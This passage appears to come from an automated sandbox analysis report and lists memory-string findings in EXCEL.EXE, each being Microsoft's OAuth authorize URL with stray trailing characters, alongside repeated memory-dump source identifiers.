    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeFU
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIU
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRZ
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeTX
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeUY
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXUR
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecome
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeeV
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic?
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeficp0
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize)
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepZ
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerX
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesY
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetV
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizewU
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
